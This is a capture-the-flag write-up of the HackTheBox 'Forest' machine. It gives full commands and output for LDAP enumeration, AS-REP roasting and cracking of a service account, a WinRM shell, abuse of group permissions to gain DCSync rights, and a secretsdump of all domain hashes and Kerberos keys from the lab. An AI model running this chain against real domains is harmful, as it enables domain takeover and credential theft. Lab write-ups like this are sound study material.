Post

HackTheBox Forest Writeup

Nmap Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# Nmap 7.95 scan initiated Sat May 24 12:17:08 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up, received echo-reply ttl 127 (0.061s latency).
Scanned at 2025-05-24 12:17:08 CDT for 27s
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE      REASON          VERSION
53/tcp   open  domain       syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-24 09:03:19Z)
135/tcp  open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?    syn-ack ttl 127
593/tcp  open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped   syn-ack ttl 127
3268/tcp open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped   syn-ack ttl 127
5985/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -5h53m54s, deviation: 4h02m31s, median: -8h13m55s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 32753/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 16481/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 44587/udp): CLEAN (Timeout)
|   Check 4 (port 35687/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2025-05-24T09:03:27
|_  start_date: 2025-05-24T09:01:18
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2025-05-24T02:03:29-07:00

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 24 12:17:35 2025 -- 1 IP address (1 host up) scanned in 27.48 seconds

LDAP Enumeration

Users Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec ldap 10.10.10.161 -u '' -p '' --users
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.10.10.161    389    FOREST           [+] htb.local\: 
LDAP        10.10.10.161    389    FOREST           [*] Total of records returned 34
LDAP        10.10.10.161    389    FOREST           Administrator                  Built-in account for administering the computer/domain
LDAP        10.10.10.161    389    FOREST           Guest                          Built-in account for guest access to the computer/domain
LDAP        10.10.10.161    389    FOREST           DefaultAccount                 A user account managed by the system.
LDAP        10.10.10.161    389    FOREST           krbtgt                         Key Distribution Center Service Account
LDAP        10.10.10.161    389    FOREST           $331000-VK4ADACQNUCA           
LDAP        10.10.10.161    389    FOREST           SM_2c8eef0a09b545acb           
LDAP        10.10.10.161    389    FOREST           SM_ca8c2ed5bdab4dc9b           
LDAP        10.10.10.161    389    FOREST           SM_75a538d3025e4db9a           
LDAP        10.10.10.161    389    FOREST           SM_681f53d4942840e18           
LDAP        10.10.10.161    389    FOREST           SM_1b41c9286325456bb           
LDAP        10.10.10.161    389    FOREST           SM_9b69f1b9d2cc45549           
LDAP        10.10.10.161    389    FOREST           SM_7c96b981967141ebb           
LDAP        10.10.10.161    389    FOREST           SM_c75ee099d0a64c91b           
LDAP        10.10.10.161    389    FOREST           SM_1ffab36a2f5f479cb           
LDAP        10.10.10.161    389    FOREST           HealthMailboxc3d7722           
LDAP        10.10.10.161    389    FOREST           HealthMailboxfc9daad           
LDAP        10.10.10.161    389    FOREST           HealthMailboxc0a90c9           
LDAP        10.10.10.161    389    FOREST           HealthMailbox670628e           
LDAP        10.10.10.161    389    FOREST           HealthMailbox968e74d           
LDAP        10.10.10.161    389    FOREST           HealthMailbox6ded678           
LDAP        10.10.10.161    389    FOREST           HealthMailbox83d6781           
LDAP        10.10.10.161    389    FOREST           HealthMailboxfd87238           
LDAP        10.10.10.161    389    FOREST           HealthMailboxb01ac64           
LDAP        10.10.10.161    389    FOREST           HealthMailbox7108a4e           
LDAP        10.10.10.161    389    FOREST           HealthMailbox0659cc1           
LDAP        10.10.10.161    389    FOREST           sebastien                      
LDAP        10.10.10.161    389    FOREST           lucinda                        
LDAP        10.10.10.161    389    FOREST           svc-alfresco                   
LDAP        10.10.10.161    389    FOREST           andy                           
LDAP        10.10.10.161    389    FOREST           mark                           
LDAP        10.10.10.161    389    FOREST           santi

Group Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec ldap 10.10.10.161 -u '' -p '' --groups
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.10.10.161    389    FOREST           [+] htb.local\: 
LDAP        10.10.10.161    389    FOREST           Administrators
LDAP        10.10.10.161    389    FOREST           Users
LDAP        10.10.10.161    389    FOREST           Guests
LDAP        10.10.10.161    389    FOREST           Print Operators
LDAP        10.10.10.161    389    FOREST           Backup Operators
LDAP        10.10.10.161    389    FOREST           Replicator
LDAP        10.10.10.161    389    FOREST           Remote Desktop Users
LDAP        10.10.10.161    389    FOREST           Network Configuration Operators
LDAP        10.10.10.161    389    FOREST           Performance Monitor Users
LDAP        10.10.10.161    389    FOREST           Performance Log Users
LDAP        10.10.10.161    389    FOREST           Distributed COM Users
LDAP        10.10.10.161    389    FOREST           IIS_IUSRS
LDAP        10.10.10.161    389    FOREST           Cryptographic Operators
LDAP        10.10.10.161    389    FOREST           Event Log Readers
LDAP        10.10.10.161    389    FOREST           Certificate Service DCOM Access
LDAP        10.10.10.161    389    FOREST           RDS Remote Access Servers
LDAP        10.10.10.161    389    FOREST           RDS Endpoint Servers
LDAP        10.10.10.161    389    FOREST           RDS Management Servers
LDAP        10.10.10.161    389    FOREST           Hyper-V Administrators
LDAP        10.10.10.161    389    FOREST           Access Control Assistance Operators
LDAP        10.10.10.161    389    FOREST           Remote Management Users
LDAP        10.10.10.161    389    FOREST           System Managed Accounts Group
LDAP        10.10.10.161    389    FOREST           Storage Replica Administrators
LDAP        10.10.10.161    389    FOREST           Domain Computers
LDAP        10.10.10.161    389    FOREST           Domain Controllers
LDAP        10.10.10.161    389    FOREST           Schema Admins
LDAP        10.10.10.161    389    FOREST           Enterprise Admins
LDAP        10.10.10.161    389    FOREST           Cert Publishers
LDAP        10.10.10.161    389    FOREST           Domain Admins
LDAP        10.10.10.161    389    FOREST           Domain Users
LDAP        10.10.10.161    389    FOREST           Domain Guests
LDAP        10.10.10.161    389    FOREST           Group Policy Creator Owners
LDAP        10.10.10.161    389    FOREST           RAS and IAS Servers
LDAP        10.10.10.161    389    FOREST           Server Operators
LDAP        10.10.10.161    389    FOREST           Account Operators
LDAP        10.10.10.161    389    FOREST           Pre-Windows 2000 Compatible Access
LDAP        10.10.10.161    389    FOREST           Incoming Forest Trust Builders
LDAP        10.10.10.161    389    FOREST           Windows Authorization Access Group
LDAP        10.10.10.161    389    FOREST           Terminal Server License Servers
LDAP        10.10.10.161    389    FOREST           Allowed RODC Password Replication Group
LDAP        10.10.10.161    389    FOREST           Denied RODC Password Replication Group
LDAP        10.10.10.161    389    FOREST           Read-only Domain Controllers
LDAP        10.10.10.161    389    FOREST           Enterprise Read-only Domain Controllers
LDAP        10.10.10.161    389    FOREST           Cloneable Domain Controllers
LDAP        10.10.10.161    389    FOREST           Protected Users
LDAP        10.10.10.161    389    FOREST           Key Admins
LDAP        10.10.10.161    389    FOREST           Enterprise Key Admins
LDAP        10.10.10.161    389    FOREST           DnsAdmins
LDAP        10.10.10.161    389    FOREST           DnsUpdateProxy
LDAP        10.10.10.161    389    FOREST           Organization Management
LDAP        10.10.10.161    389    FOREST           Recipient Management
LDAP        10.10.10.161    389    FOREST           View-Only Organization Management
LDAP        10.10.10.161    389    FOREST           Public Folder Management
LDAP        10.10.10.161    389    FOREST           UM Management
LDAP        10.10.10.161    389    FOREST           Help Desk
LDAP        10.10.10.161    389    FOREST           Records Management
LDAP        10.10.10.161    389    FOREST           Discovery Management
LDAP        10.10.10.161    389    FOREST           Server Management
LDAP        10.10.10.161    389    FOREST           Delegated Setup
LDAP        10.10.10.161    389    FOREST           Hygiene Management
LDAP        10.10.10.161    389    FOREST           Compliance Management
LDAP        10.10.10.161    389    FOREST           Security Reader
LDAP        10.10.10.161    389    FOREST           Security Administrator
LDAP        10.10.10.161    389    FOREST           Exchange Servers
LDAP        10.10.10.161    389    FOREST           Exchange Trusted Subsystem
LDAP        10.10.10.161    389    FOREST           Managed Availability Servers
LDAP        10.10.10.161    389    FOREST           Exchange Windows Permissions
LDAP        10.10.10.161    389    FOREST           ExchangeLegacyInterop
LDAP        10.10.10.161    389    FOREST           Exchange Install Domain Servers
LDAP        10.10.10.161    389    FOREST           Service Accounts
LDAP        10.10.10.161    389    FOREST           Privileged IT Accounts
LDAP        10.10.10.161    389    FOREST           test

AS-REP Roasting

1
2
3
4
5
6
7
8
9
10
11
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ sudo impacket-GetNPUsers -request -dc-ip 10.10.10.161 htb.local/
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC      
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2025-05-24 04:16:30.231609  2019-09-23 06:09:47.931194  0x410200 



$krb5asrep$23$svc-alfresco@HTB.LOCAL:1b8d21b25f5418adecf03a0be651c60d$f32dcfa90aa1510e5cb506e2be94bacbea6f156a1acbaaf65c08571d5d6a6fd2f50ccfbb2934b18a776a58497264985495abc4b67f50b34ea815ee0f5abd700d1956c205adc5e8c12db6feddf3fe96b3d6c38916c5d17a661badb348aa752e6c3bf165448a7530a6635993fdeab737a0e1180d13785ac14e5032f417e63ae284471c1e802ffc6341191890a0fcc3fa1963ff8b5a418ed4597d6e355e6a3543f833236f7bc818e717b1fa2d6c52a94b67a1b6689841b2e51d551e088295dc80c9a2721ab80529b5997e4aef9886a7b0e15f87b1f8cd54702232c5b0a2878eb20d9668cc6940b2

Try Cracking

1
2
3
4
5
6
7
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ sudo hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt --force
...

$krb5asrep$23$svc-alfresco@HTB.LOCAL:1b8d21b25f5418adecf03a0be651c60d$f32dcfa90aa1510e5cb506e2be94bacbea6f156a1acbaaf65c08571d5d6a6fd2f50ccfbb2934b18a776a58497264985495abc4b67f50b34ea815ee0f5abd700d1956c205adc5e8c12db6feddf3fe96b3d6c38916c5d17a661badb348aa752e6c3bf165448a7530a6635993fdeab737a0e1180d13785ac14e5032f417e63ae284471c1e802ffc6341191890a0fcc3fa1963ff8b5a418ed4597d6e355e6a3543f833236f7bc818e717b1fa2d6c52a94b67a1b6689841b2e51d551e088295dc80c9a2721ab80529b5997e4aef9886a7b0e15f87b1f8cd54702232c5b0a2878eb20d9668cc6940b2:s3rvice

...

Good! We got the credentials svc-alfresco:s3rvice.

SMB Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec smb 10.10.10.161 -u 'svc-alfresco' -p 's3rvice' --shares
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [+] htb.local\svc-alfresco:s3rvice 
SMB         10.10.10.161    445    FOREST           [+] Enumerated shares
SMB         10.10.10.161    445    FOREST           Share           Permissions     Remark
SMB         10.10.10.161    445    FOREST           -----           -----------     ------
SMB         10.10.10.161    445    FOREST           ADMIN$                          Remote Admin
SMB         10.10.10.161    445    FOREST           C$                              Default share
SMB         10.10.10.161    445    FOREST           IPC$                            Remote IPC
SMB         10.10.10.161    445    FOREST           NETLOGON        READ            Logon server share 
SMB         10.10.10.161    445    FOREST           SYSVOL          READ            Logon server share 

WinRM Enumeration

1
2
3
4
5
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec winrm 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'     
SMB         10.10.10.161    5985   FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
HTTP        10.10.10.161    5985   FOREST           [*] http://10.10.10.161:5985/wsman
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
1
2
3
4
5
6
7
8
9
10
11
12
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'                        
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco

Post Exploitation

Quick Check

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA     Administrator            andy
DefaultAccount           Guest                    HealthMailbox0659cc1
HealthMailbox670628e     HealthMailbox6ded678     HealthMailbox7108a4e
HealthMailbox83d6781     HealthMailbox968e74d     HealthMailboxb01ac64
HealthMailboxc0a90c9     HealthMailboxc3d7722     HealthMailboxfc9daad
HealthMailboxfd87238     krbtgt                   lucinda
mark                     santi                    sebastien
SM_1b41c9286325456bb     SM_1ffab36a2f5f479cb     SM_2c8eef0a09b545acb
SM_681f53d4942840e18     SM_75a538d3025e4db9a     SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549     SM_c75ee099d0a64c91b     SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> 
1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

WinPEASx64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
ÉÍÍÍÍÍÍÍÍÍ͹ Current TCP Listening Ports
È Check for services restricted from the outside 
  Enumerating IPv4 connections
                                                                                                                                                             
  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name

  TCP        0.0.0.0               88            0.0.0.0               0               Listening         584             lsass
  TCP        0.0.0.0               135           0.0.0.0               0               Listening         812             svchost
  TCP        0.0.0.0               389           0.0.0.0               0               Listening         584             lsass
  TCP        0.0.0.0               445           0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               464           0.0.0.0               0               Listening         584             lsass
  TCP        0.0.0.0               593           0.0.0.0               0               Listening         812             svchost
  TCP        0.0.0.0               636           0.0.0.0               0               Listening         584             lsass
  TCP        0.0.0.0               3268          0.0.0.0               0               Listening         584             lsass
  TCP        0.0.0.0               3269          0.0.0.0               0               Listening         584             lsass
  TCP        0.0.0.0               5985          0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               9389          0.0.0.0               0               Listening         1968            Microsoft.ActiveDirectory.WebServices


...

Bloodhound

Note that we are a member of ACCOUNT OPERATORS, which is a group that by default has privileges to create and modify most types of accounts, including accounts for users, Local groups, and Global groups.

This means we can add our credentials to groups.

Note that we still cannot join ourselves to DOMAIN ADMINS… REASON: TODO

Join to which groups?

By looking at this relationship, we can add ourselves to EXCHANGE WINDOWS PERMISSIONS, which then has WriteDACL on the domain, allowing us to grant ourselves DCSync privileges.

1
2
3
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ bloodyAD --host 10.10.10.161 -d 'htb.local' -u 'svc-alfresco' -p 's3rvice' add groupMember "EXCHANGE WINDOWS PERMISSIONS" "svc-alfresco"
[+] svc-alfresco added to EXCHANGE WINDOWS PERMISSIONS

Then we follow the bloodhound guide to grant ourselves DCSync privileges.

Add DCSync Privileges

However, the bloodhound guide seems to be wrong (or old). By searching Google: https://www.thehacker.recipes/ad/movement/dacl/grant-rights

1
2
3
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ bloodyAD --host 10.10.10.161 -d 'htb.local' -u 'svc-alfresco' -p 's3rvice' add dcsync "svc-alfresco"                                    
[+] svc-alfresco is now able to DCSync

Exploit DCSync

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ sudo impacket-secretsdump "htb.local/svc-alfresco":"s3rvice"@10.10.10.161                                                    
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:e3fcfad73bfa8569bd3d181167a3cd4e:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
